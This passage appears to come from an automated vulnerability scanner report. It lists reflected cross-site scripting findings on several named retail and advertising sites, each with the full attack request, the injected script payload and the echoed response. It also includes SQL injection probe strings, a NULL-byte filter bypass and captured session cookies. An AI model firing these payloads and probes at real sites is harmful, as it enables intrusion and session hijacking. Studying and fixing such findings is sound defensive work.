Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=eXga8szVoaFc; s_cc=true; cmTPSet=Y; 90232094_clogin=l=1301081933&v=3&e=1301083733427; PS_ALL=%23ps_catid%7EHome; s_sq=mlTTAprod%3D%2526pid%253DHome/Home%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//www.territoryahead.com/account/orderhistory/orderstatus.jsp%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Fri, 25 Mar 2011 19:52:05 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36996


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
et=Y; 90232094_clogin=l=1301081933&v=3&e=1301083737353; PS_ALL=%23ps_catid%7Eaccount; s_sq=%5B%5BB%5D%5D; cmRS=t3=1301080538915&pi=ERROR
UNIQUE_ID: 7addkawSrSgAAETmf2gAAAAj
SCRIPT_URL: /account36360--><script>alert(1)</script>6c3f9b7fbac/orderhistory/orderstatus.jsp
SCRIPT_URI: https://www.territoryahead.com/account36360-->
...[SNIP]...
5.117. https://www.territoryahead.com/account/orderhistory/orderstatus.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/orderhistory/orderstatus.jsp

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 938be--><script>alert(1)</script>8fe3bc39588 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/orderhistory938be--><script>alert(1)</script>8fe3bc39588/orderstatus.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
Referer: https://www.territoryahead.com/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=eXga8szVoaFc; s_cc=true; cmTPSet=Y; 90232094_clogin=l=1301081933&v=3&e=1301083733427; PS_ALL=%23ps_catid%7EHome; s_sq=mlTTAprod%3D%2526pid%253DHome/Home%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//www.territoryahead.com/account/orderhistory/orderstatus.jsp%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Fri, 25 Mar 2011 19:52:24 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36996


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
4_clogin=l=1301081933&v=3&e=1301083737353; PS_ALL=%23ps_catid%7Eaccount; s_sq=%5B%5BB%5D%5D; cmRS=t3=1301080538915&pi=ERROR
UNIQUE_ID: 7tFtL6wSrSgAAEYWPr8AAAAU
SCRIPT_URL: /account/orderhistory938be--><script>alert(1)</script>8fe3bc39588/orderstatus.jsp
SCRIPT_URI: https://www.territoryahead.com/account/orderhistory938be-->
...[SNIP]...
5.118. https://www.territoryahead.com/jump.jsp ['%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E request parameter is copied into an HTML comment. The payload 22046--><script>alert(1)</script>0a045e66a8a was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E22046--><script>alert(1)</script>0a045e66a8a HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:16:24 GMT
Server: Apache
ETag: "AAAAS7ub5Kb"
Last-Modified: Fri, 25 Mar 2011 19:13:32 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38022


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
%3Ealert%280x000045%29%3C%2Fscript%3E22046--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0a045e66a8a=&itemType=ErrorPage&itemID=1&'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E22046--><script>alert(1)</script>0a045e66a8a
Session ID: a-e7l_ipIG-e (from cookie)

Parameters:
ruleID = 8
itemID = 1
itemID = 1
itemType = ErrorPage
itemType = ErrorPage
&#39;&#x22;--&gt;&lt;/style&gt;&lt;/script&gt;&lt
...[SNIP]...
5.119. https://www.territoryahead.com/jump.jsp [itemID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the itemID request parameter is copied into an HTML comment. The payload 60a71--><script>alert(1)</script>23be3cee852 was submitted in the itemID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?itemType=CATEGORY&itemID=-1+OR+17-7%3d1060a71--><script>alert(1)</script>23be3cee852&path=1%2C2%2C195%2C241 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; customer=92643931

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:26:03 GMT
Server: Apache
ETag: "AAAAS7ucEGn"
Last-Modified: Fri, 25 Mar 2011 19:14:17 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38646


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...

JVM: tta06
Request: GET https://www.territoryahead.com/errorhandler.jsp?ruleID=8&itemID=1&itemType=ErrorPage&path=1%2C2%2C195%2C241&itemType=ErrorPage&itemID=1&itemType=CATEGORY&itemID=-1+OR+17-7%3d1060a71--><script>alert(1)</script>23be3cee852&path=1%2C2%2C195%2C241
Session ID: auMBUcQMcNOb (from cookie)

Parameters:
ruleID = 8
itemID = 1
itemID = 1
itemID = -1 OR 17-7=1060a71--&gt;&lt;script&gt;alert&#x28;1&#x29;&lt;/script
...[SNIP]...
5.120. https://www.territoryahead.com/jump.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload de539--><script>alert(1)</script>eea1fdeeba0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E&de539--><script>alert(1)</script>eea1fdeeba0=1 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:17:55 GMT
Server: Apache
ETag: "AAAAS7ucPZy"
Last-Modified: Fri, 25 Mar 2011 19:15:03 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38669


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
pt%3E=&itemID=1&de539--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eeea1fdeeba0=1&itemType=ErrorPage&itemType=ErrorPage&itemID=1&'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E&de539--><script>alert(1)</script>eea1fdeeba0=1
Session ID: auMBUcQMcNOb (from cookie)

Parameters:
ruleID = 8
itemID = 1
itemID = 1
&#39;&#x22;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;alert&#x28;0x000045&#x29;&lt;/script&
...[SNIP]...
5.121. https://www.territoryahead.com/jump.jsp [path parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the path request parameter is copied into an HTML comment. The payload 39c78--><script>alert(1)</script>ebbf84990a5 was submitted in the path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?itemType=CATEGORY&itemID=-1+OR+17-7%3d10&path=1%2C2%2C195%2C24139c78--><script>alert(1)</script>ebbf84990a5 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; customer=92643931

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:26:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 39875


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
age&ruleID=18&itemID=-1+OR+17-7%3D10&path=1%2C2%2C195%2C24139c78--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eebbf84990a5&itemType=CATEGORY&itemType=CATEGORY&itemID=-1+OR+17-7%3d10&path=1%2C2%2C195%2C24139c78--><script>alert(1)</script>ebbf84990a5
Session ID: auMBUcQMcNOb (from cookie)

Parameters:
ruleID = 8
ruleID = 18
ruleID = 18
itemID = 0
itemID = 0
itemID = -1 OR 17-7=10
itemID = -1 OR 17-7=10
itemType = Er
...[SNIP]...
5.122. https://www2.hbc.com/contactus/contact-us.asp [langid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www2.hbc.com
Path:   /contactus/contact-us.asp

Issue detail

The value of the langid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bb17"><script>alert(1)</script>fb63dd7b86f was submitted in the langid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contactus/contact-us.asp?langid=en3bb17"><script>alert(1)</script>fb63dd7b86f&src=hbc HTTP/1.1
Host: www2.hbc.com
Connection: keep-alive
Referer: http://www2.hbc.com/en/index.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10820
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSQXCCBAB=JCAOOEFBMFHPBEJFEIFCGJCJ; secure; path=/
X-Powered-By: ASP.NET
Date: Wed, 30 Mar 2011 13:51:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...
<input type="hidden" name="iLanguage" value="en3bb17"><script>alert(1)</script>fb63dd7b86f"/>
...[SNIP]...
5.123. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload e04df<script>alert(1)</script>f493791083e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725
Referer: http://www.google.com/search?hl=en&q=e04df<script>alert(1)</script>f493791083e

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Thu, 31 Mar 2011 00:53:52 GMT
Expires: Thu, 31 Mar 2011 00:53:52 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACSCDSTQ=MIGLCKNBKFIFPCAGJMEPDNMN; path=/
X-Powered-By: ASP.NET
Content-Length: 969
Connection: keep-alive

<br>Error Description:No value given for one or more required parameters.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>alert(0x000013)</script>, @bannerCreativeA
...[SNIP]...
@syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '497205542', @pixel = '0', @ipNumber = '2915161843', @referer = 'http://www.google.com/search?hl=en&q=e04df<script>alert(1)</script>f493791083e', @browserName = 'Default', @browserVersion = '0.0', @domain = 'www.google.com', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/5.0 (Windows; U; Windows NT 6.
...[SNIP]...
5.124. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 874e8<script>alert(1)</script>5752105b959 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16874e8<script>alert(1)</script>5752105b959
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Thu, 31 Mar 2011 00:53:41 GMT
Expires: Thu, 31 Mar 2011 00:53:41 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSAACDBD=IKLLEPEBBEOKMFMAJDBGEMOO; path=/
X-Powered-By: ASP.NET
Content-Length: 779
Connection: keep-alive

<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>alert(0x000013)</script>, @bannerCreativeAdModuleId = 21152,
...[SNIP]...
@operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16874e8<script>alert(1)</script>5752105b959', @segment = 'undefined'<br>
...[SNIP]...
5.125. https://www.supermedia.com/spportal/404.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/404.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eda83"-alert(1)-"46677506f9c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/404.jsp HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=eda83"-alert(1)-"46677506f9c
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1301080493266-271579#1301083842|check#true#1301082042; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:42:16 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20807


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=eda83"-alert(1)-"46677506f9c";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...
5.126. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %008ca6b"-alert(1)-"9110dd52ec7 was submitted in the Referer HTTP header. This input was echoed as 8ca6b"-alert(1)-"9110dd52ec7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /spportal/spportalFlow.do?_flowId=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafficSource=default; CstrStatus=RVU; mbox=session#1301080493266-271579#1301082422|check#true#1301080622; undefined_s=First%20Visit
Referer: http://www.google.com/search?hl=en&q=%008ca6b"-alert(1)-"9110dd52ec7

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:41:55 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 22982


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=%008ca6b"-alert(1)-"9110dd52ec7";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="No such flow definition with id '(select 1 and row
...[SNIP]...
5.127. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac3d5"-alert(1)-"2bfe3cee0a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/spportalFlow.do?_flowId=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafficSource=default; CstrStatus=RVU
Referer: http://www.google.com/search?hl=en&q=ac3d5"-alert(1)-"2bfe3cee0a

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:15:20 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 21861


